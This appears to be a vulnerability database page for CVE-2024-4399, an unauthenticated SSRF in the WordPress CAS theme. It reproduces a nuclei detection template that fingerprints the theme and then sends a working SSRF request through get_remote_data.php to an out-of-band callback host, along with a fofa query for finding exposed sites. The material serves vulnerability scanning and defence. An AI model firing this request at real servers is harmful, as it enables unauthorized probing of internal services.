Lucene search
K

WordPress CAS Theme <= 1.0.0 - Server-Side Request Forgery

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

WordPress CAS Theme versions up to 1.0.0 are vulnerable to Server-Side Request Forgery attacks.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-4399
13 Mar 202503:36
circl
CNNVD
WordPress Theme CAS 安全漏洞
23 May 202400:00
cnnvd
CVE
CVE-2024-4399
23 May 202406:00
cve
Cvelist
CVE-2024-4399 CAS <= 1.0.0 - Unauthenticated SSRF
23 May 202406:00
cvelist
NVD
CVE-2024-4399
23 May 202406:15
nvd
OSV
CVE-2024-4399
23 May 202406:15
osv
Patchstack
WordPress CAS <= 1.0.0 - Unauthenticated SSRF vulnerability
30 Jan 202607:30
patchstack
Positive Technologies
PT-2024-30854 · Jenkins +1 · Cas +1
23 May 202400:00
ptsecurity
Vulnrichment
CVE-2024-4399 CAS <= 1.0.0 - Unauthenticated SSRF
23 May 202406:00
vulnrichment
wpexploit
CAS <= 1.0.0 - Unauthenticated SSRF
2 May 202400:00
wpexploit
Rows per page
id: CVE-2024-4399

info:
  name: WordPress CAS Theme <= 1.0.0 - Server-Side Request Forgery
  author: ritikchaddha
  severity: critical
  description: |
    The CAS WordPress theme through version 1.0.0 is vulnerable to Server-Side Request Forgery (SSRF) via the 'url' parameter in the get_remote_data.php script. This vulnerability allows unauthenticated attackers to make the server perform requests to arbitrary URLs.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests via SSRF, potentially accessing internal services.
  remediation: |
    Update CAS WordPress theme to a version later than 1.0.0 that patches the SSRF vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0690327e-da60-4d71-8b3c-ac9533d82302
    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-4399
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-4399
    cwe-id: CWE-918
    epss-score: 0.01836
    epss-percentile: 0.76353
  metadata:
    max-request: 2
    product: cas
    fofa-query: body="wp-content/themes/cas/"
  tags: cve,cve2024,wp,wordpress,wp-theme,ssrf,cas,oast,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "themes/cas"
        internal: true

  - raw:
      - |
        GET /wp-content/themes/cas/get_remote_data.php?url=http://{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a0047304502207bbe4bde2650cb0ae710328a4ceb9a65c842964a122a671d656c371659fadd25022100d72aa8be38a402d28d7a6ebd7d5e322d10a80ce9e81b9275befb34dc26e16aff:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.1
EPSS0.01836
SSVC
22